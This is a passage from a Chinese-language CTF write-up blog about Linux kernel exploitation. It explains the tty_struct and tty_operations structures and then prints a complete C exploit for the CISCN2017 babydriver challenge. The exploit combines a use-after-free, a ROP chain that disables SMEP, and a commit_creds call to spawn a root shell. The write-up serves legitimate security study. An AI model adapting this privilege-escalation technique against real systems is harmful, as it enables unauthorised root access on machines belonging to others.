class="n">mutex</span> <span class="n">atomic_write_lock</span><span class="p">;</span> <span class="k">struct</span> <span class="n">mutex</span> <span class="n">legacy_mutex</span><span class="p">;</span> <span class="k">struct</span> <span class="n">mutex</span> <span class="n">throttle_mutex</span><span class="p">;</span> <span class="k">struct</span> <span class="n">rw_semaphore</span> <span class="n">termios_rwsem</span><span class="p">;</span> <span class="k">struct</span> <span class="n">mutex</span> <span class="n">winsize_mutex</span><span class="p">;</span> <span class="n">spinlock_t</span> <span class="n">ctrl_lock</span><span class="p">;</span> <span class="n">spinlock_t</span> <span class="n">flow_lock</span><span class="p">;</span> <span class="cm">/* Termios values are protected by the termios rwsem */</span> <span class="k">struct</span> <span class="n">ktermios</span> <span class="n">termios</span><span class="p">,</span> <span class="n">termios_locked</span><span class="p">;</span> <span class="k">struct</span> <span class="n">termiox</span> <span class="o">*</span><span class="n">termiox</span><span class="p">;</span> <span class="cm">/* May be NULL for unsupported */</span> <span class="kt">char</span> <span class="n">name</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span> <span class="k">struct</span> <span class="n">pid</span> <span class="o">*</span><span class="n">pgrp</span><span class="p">;</span> <span class="cm">/* Protected by ctrl lock */</span> <span class="k">struct</span> <span class="n">pid</span> <span class="o">*</span><span class="n">session</span><span class="p">;</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">;</span> <span class="kt">int</span> <span class="n">count</span><span class="p">;</span> <span class="k">struct</span> <span class="n">winsize</span> <span class="n">winsize</span><span class="p">;</span> <span class="cm">/* winsize_mutex */</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="nl">stopped</span><span class="p">:</span><span class="mi">1</span><span class="p">,</span> <span class="cm">/* flow_lock */</span> <span class="nl">flow_stopped</span><span class="p">:</span><span class="mi">1</span><span class="p">,</span> <span class="nl">unused</span><span class="p">:</span><span class="n">BITS_PER_LONG</span> <span class="o">-</span> <span class="mi">2</span><span class="p">;</span> <span class="kt">int</span> <span class="n">hw_stopped</span><span class="p">;</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="nl">ctrl_status</span><span class="p">:</span><span class="mi">8</span><span class="p">,</span> <span class="cm">/* ctrl_lock */</span> <span class="nl">packet</span><span class="p">:</span><span class="mi">1</span><span class="p">,</span> <span class="nl">unused_ctrl</span><span class="p">:</span><span class="n">BITS_PER_LONG</span> <span class="o">-</span> <span class="mi">9</span><span class="p">;</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">receive_room</span><span class="p">;</span> <span class="cm">/* Bytes free for queue */</span> <span class="kt">int</span> <span class="n">flow_change</span><span class="p">;</span> <span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">link</span><span class="p">;</span> <span class="k">struct</span> <span class="n">fasync_struct</span> <span class="o">*</span><span class="n">fasync</span><span class="p">;</span> <span class="n">wait_queue_head_t</span> <span class="n">write_wait</span><span class="p">;</span> <span class="n">wait_queue_head_t</span> <span class="n">read_wait</span><span class="p">;</span> <span class="k">struct</span> <span class="n">work_struct</span> <span class="n">hangup_work</span><span class="p">;</span> <span class="kt">void</span> <span class="o">*</span><span class="n">disc_data</span><span class="p">;</span> <span class="kt">void</span> <span class="o">*</span><span class="n">driver_data</span><span class="p">;</span> <span class="n">spinlock_t</span> <span class="n">files_lock</span><span class="p">;</span> <span class="cm">/* protects tty_files list */</span> <span class="k">struct</span> <span class="n">list_head</span> <span class="n">tty_files</span><span class="p">;</span> <span class="cp">#define N_TTY_BUF_SIZE 4096 </span><span class="cp"></span> <span class="kt">int</span> <span class="n">closing</span><span class="p">;</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="o">*</span><span class="n">write_buf</span><span class="p">;</span> <span class="kt">int</span> <span class="n">write_cnt</span><span class="p">;</span> <span class="cm">/* If the tty has a pending do_SAK, queue it here - akpm */</span> <span class="k">struct</span> <span class="n">work_struct</span> <span class="n">SAK_work</span><span class="p">;</span> <span class="k">struct</span> <span class="n">tty_port</span> <span class="o">*</span><span class="n">port</span><span class="p">;</span> <span class="p">}</span> <span class="n">__randomize_layout</span><span class="p">;</span> </code></pre></td></tr></table> </div> </div><p>为什么要控制这个结构体呢？因为其中有另一个很有趣的结构体 <code>tty_operations</code>，<a href="https://code.woboq.org/linux/linux/include/linux/tty_driver.h.html#tty_operations">源码</a> 如下：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="k">struct</span> <span class="n">tty_operations</span> <span class="p">{</span> <span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span> <span class="p">(</span><span class="o">*</span><span class="n">lookup</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_driver</span> <span class="o">*</span><span class="n">driver</span><span class="p">,</span> <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">filp</span><span class="p">,</span> <span class="kt">int</span> <span class="n">idx</span><span class="p">);</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">install</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_driver</span> <span class="o">*</span><span class="n">driver</span><span class="p">,</span> <span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">);</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">remove</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_driver</span> <span class="o">*</span><span class="n">driver</span><span class="p">,</span> <span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">);</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">open</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span> <span class="n">tty</span><span class="p">,</span> <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span> <span class="n">filp</span><span class="p">);</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">close</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span> <span class="n">tty</span><span class="p">,</span> <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span> <span class="n">filp</span><span class="p">);</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">shutdown</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">);</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">cleanup</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">);</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">write</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span> <span class="n">tty</span><span class="p">,</span> <span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">int</span> <span class="n">count</span><span class="p">);</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">put_char</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">ch</span><span class="p">);</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">flush_chars</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">);</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">write_room</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">);</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">chars_in_buffer</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">);</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">ioctl</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">cmd</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">arg</span><span class="p">);</span> <span class="kt">long</span> <span class="p">(</span><span class="o">*</span><span class="n">compat_ioctl</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">cmd</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">arg</span><span class="p">);</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">set_termios</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">,</span> <span class="k">struct</span> <span class="n">ktermios</span> <span class="o">*</span> <span class="n">old</span><span class="p">);</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">throttle</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span> <span class="n">tty</span><span class="p">);</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">unthrottle</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span> <span class="n">tty</span><span class="p">);</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">stop</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">);</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">start</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">);</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">hangup</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">);</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">break_ctl</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">,</span> <span class="kt">int</span> <span class="n">state</span><span class="p">);</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">flush_buffer</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">);</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">set_ldisc</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">);</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">wait_until_sent</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">,</span> <span class="kt">int</span> <span class="n">timeout</span><span class="p">);</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">send_xchar</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">,</span> <span class="kt">char</span> <span class="n">ch</span><span class="p">);</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">tiocmget</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">);</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">tiocmset</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">set</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">clear</span><span class="p">);</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">resize</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">,</span> <span class="k">struct</span> <span class="n">winsize</span> <span class="o">*</span><span class="n">ws</span><span class="p">);</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">set_termiox</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">,</span> <span class="k">struct</span> <span class="n">termiox</span> <span class="o">*</span><span class="n">tnew</span><span class="p">);</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">get_icount</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">,</span> <span class="k">struct</span> <span class="n">serial_icounter_struct</span> <span class="o">*</span><span class="n">icount</span><span class="p">);</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">show_fdinfo</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">,</span> <span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">);</span> <span class="cp">#ifdef CONFIG_CONSOLE_POLL </span><span class="cp"></span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">poll_init</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_driver</span> <span class="o">*</span><span class="n">driver</span><span class="p">,</span> <span class="kt">int</span> <span class="n">line</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">options</span><span class="p">);</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">poll_get_char</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_driver</span> <span class="o">*</span><span class="n">driver</span><span class="p">,</span> <span class="kt">int</span> <span class="n">line</span><span class="p">);</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">poll_put_char</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_driver</span> <span class="o">*</span><span class="n">driver</span><span class="p">,</span> <span class="kt">int</span> <span class="n">line</span><span class="p">,</span> <span class="kt">char</span> <span class="n">ch</span><span class="p">);</span> <span class="cp">#endif </span><span class="cp"></span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">proc_show</span><span class="p">)(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="p">);</span> <span class="p">}</span> <span class="n">__randomize_layout</span><span class="p">;</span> </code></pre></td></tr></table> </div> </div><p>大把的函数指针（pwn 手的风水宝地），因此设想构造下图所示结构体</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">fake_tty_struct fake_tty_operations +---------+ +----------+ |magic | +--&gt;|evil 1 | +---------+ | +----------+ |...... | | |evil 2 | |...... | | +----------+ +---------+ | |evil 3 | |*ops |--+ +----------+ +---------+ |evil 4 | |...... | +----------+ |...... | |...... | +---------+ +----------+ </code></pre></td></tr></table> </div> </div><p>那么我们就可以通过不同的操作（如 <code>write, ioctl</code> 等）来跳转到不同的 evil 了。</p> <p>对这道题目而言，因为开启了 smep 保护，因此如果想 ret2usr 提权，需要修改 cr4 的值，而控制函数指针是不够的，可以控制函数指针进行 stack pivot 等操作到我们排布 rop 链的空间，通过 rop 关闭 smep，进而进行后续操作。</p> <blockquote> <p>这道题目没给 vmlinux，需要使用 <a href="https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux">extract-vmlinux</a> 解压内核镜像。</p> </blockquote> <p>关闭 smep 保护后，就可以通过 rop 来为所欲为了，最终的 <a href="https://github.com/bash-c/pwn_repo/blob/master/CISCN2017_babydriver/uaf_tty_struct.c">exp</a> 如下:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;sys/types.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="cp"> </span><span class="cp"></span> <span class="cp">#define prepare_kernel_cred_addr 0xffffffff810a1810 </span><span class="cp">#define commit_creds_addr 0xffffffff810a1420 </span><span class="cp"></span> <span class="kt">void</span><span class="o">*</span> <span class="n">fake_tty_operations</span><span class="p">[</span><span class="mi">30</span><span class="p">];</span> <span class="n">size_t</span> <span class="n">user_cs</span><span class="p">,</span> <span class="n">user_ss</span><span class="p">,</span> <span class="n">user_rflags</span><span class="p">,</span> <span class="n">user_sp</span><span class="p">;</span> <span class="kt">void</span> <span class="nf">save_status</span><span class="p">()</span> <span class="p">{</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">&#34;mov user_cs, cs;&#34;</span> <span class="s">&#34;mov user_ss, ss;&#34;</span> <span class="s">&#34;mov user_sp, rsp;&#34;</span> <span class="s">&#34;pushf;&#34;</span> <span class="s">&#34;pop user_rflags;&#34;</span> <span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;[*]status has been saved.&#34;</span><span class="p">);</span> <span class="p">}</span> <span class="kt">void</span> <span class="nf">get_shell</span><span class="p">()</span> <span class="p">{</span> <span class="n">system</span><span class="p">(</span><span class="s">&#34;/bin/sh&#34;</span><span class="p">);</span> <span class="p">}</span> <span class="kt">void</span> <span class="nf">get_root</span><span class="p">()</span> <span class="p">{</span> <span class="kt">char</span><span class="o">*</span> <span class="p">(</span><span class="o">*</span><span class="n">pkc</span><span class="p">)(</span><span class="kt">int</span><span class="p">)</span> <span class="o">=</span> <span class="n">prepare_kernel_cred_addr</span><span class="p">;</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">cc</span><span class="p">)(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span> <span class="o">=</span> <span class="n">commit_creds_addr</span><span class="p">;</span> <span class="p">(</span><span class="o">*</span><span class="n">cc</span><span class="p">)((</span><span class="o">*</span><span class="n">pkc</span><span class="p">)(</span><span class="mi">0</span><span class="p">));</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="n">save_status</span><span class="p">();</span> <span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">size_t</span> <span class="n">rop</span><span class="p">[</span><span class="mi">32</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xffffffff810d238d</span><span class="p">;</span> <span class="c1">// pop rdi; ret; </span><span class="c1"></span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x6f0</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xffffffff81004d80</span><span class="p">;</span> <span class="c1">// mov cr4, rdi; pop rbp; ret; </span><span class="c1"></span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">size_t</span><span class="p">)</span><span class="n">get_root</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xffffffff81063694</span><span class="p">;</span> <span class="c1">// swapgs; pop rbp; ret; </span><span class="c1"></span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xffffffff814e35ef</span><span class="p">;</span> <span class="c1">// iretq; ret; </span><span class="c1"></span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">size_t</span><span class="p">)</span><span class="n">get_shell</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_cs</span><span class="p">;</span> <span class="cm">/* saved CS */</span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_rflags</span><span class="p">;</span> <span class="cm">/* saved EFLAGS */</span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_sp</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="n">i</span><span class="o">++</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_ss</span><span class="p">;</span> <span class="k">for</span><span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">30</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="n">fake_tty_operations</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xFFFFFFFF8181BFC5</span><span class="p">;</span> <span class="p">}</span> <span class="n">fake_tty_operations</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xffffffff810635f5</span><span class="p">;</span> <span class="c1">//pop rax; pop rbp; ret; </span><span class="c1"></span> <span class="n">fake_tty_operations</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">size_t</span><span class="p">)</span><span class="n">rop</span><span class="p">;</span> <span class="n">fake_tty_operations</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xFFFFFFFF8181BFC5</span><span class="p">;</span> <span class="c1">// mov rsp,rax ; dec ebx ; ret </span><span class="c1"></span> <span class="kt">int</span> <span class="n">fd1</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">&#34;/dev/babydev&#34;</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">);</span> <span class="kt">int</span> <span class="n">fd2</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">&#34;/dev/babydev&#34;</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">);</span> <span class="n">ioctl</span><span class="p">(</span><span class="n">fd1</span><span class="p">,</span> <span class="mh">0x10001</span><span class="p">,</span> <span class="mh">0x2e0</span><span class="p">);</span> <span class="n">close</span><span class="p">(</span><span class="n">fd1</span><span class="p">);</span> <span class="kt">int</span> <span class="n">fd_tty</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">&#34;/dev/ptmx&#34;</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="o">|</span><span class="n">O_NOCTTY</span><span class="p">);</span> <span class="n">size_t</span> <span class="n">fake_tty_struct</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="n">read</span><span class="p">(</span><span class="n">fd2</span><span class="p">,</span> <span class="n">fake_tty_struct</span><span class="p">,</span> <span class="mi">32</span><span class="p">);</span> <span class="n">fake_tty_struct</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">size_t</span><span class="p">)</span><span class="n">fake_tty_operations</span><span class="p">;</span> <span class="n">write</span><span class="p">(</span><span class="n">fd2</span><span class="p">,</span><span class="n">fake_tty_struct</span><span class="p">,</span> <span class="mi">32</span><span class="p">);</span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mh">0x8</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="n">write</span><span class="p">(</span><span class="n">fd_tty</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">8</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div> https://bash-c.github.io/post/linux-kernel-pwn-abc-1/ Wed, 03 Oct 2018 19:50:41 +0800 https://bash-c.github.io/post/linux-kernel-pwn-abc-1/ <p>记录一下最近学到的 linux kernel pwn 知识，第一篇主要是一些基础知识和简单漏洞利用，比较基础。</p> <h2 id="basic-knowledge">Basic Knowledge</h2> <p>主要参考了 <a href="https://github.com/bash-c/slides/blob/master/pwn_kernel/13_lecture.pdf">Linux Kernel Exploitation</a>，另外强力建议阅读 <a href="http://mp.weixin.qq.com/mp/homepage?__biz=MzI3NzA5MzUxNA==&amp;hid=2&amp;sn=73cb26dd403cac563c9d661a8126c035&amp;scene=18#wechat_redirect">内核模块编程入门</a>。</p> <h3 id="kernel">Kernel</h3> <p>kernel 也是一个程序，用来管理软件发出的数据 I/O 要求，讲这些要求转义为指令，交给 CPU 和计算机中的其他组件处理，kernel 是现代操作系统最基本的部分。</p> <p><img src="https://upload.wikimedia.org/wikipedia/commons/8/8f/Kernel_Layout.svg" alt=""></p> <p>kernel 最主要的功能有两点：</p> <ol> <li>控制并与硬件进行交互</li> <li>提供 application 能运行的环境</li> </ol> <p>包括 I/O，权限控制，系统调用，进程管理，内存管理等多项功能都可以归结到上边两点中。</p> <p>需要注意的是，<strong>kernel 的 crash 通常会引起重启</strong>。</p> <h3 id="ring-model">Ring Model</h3> 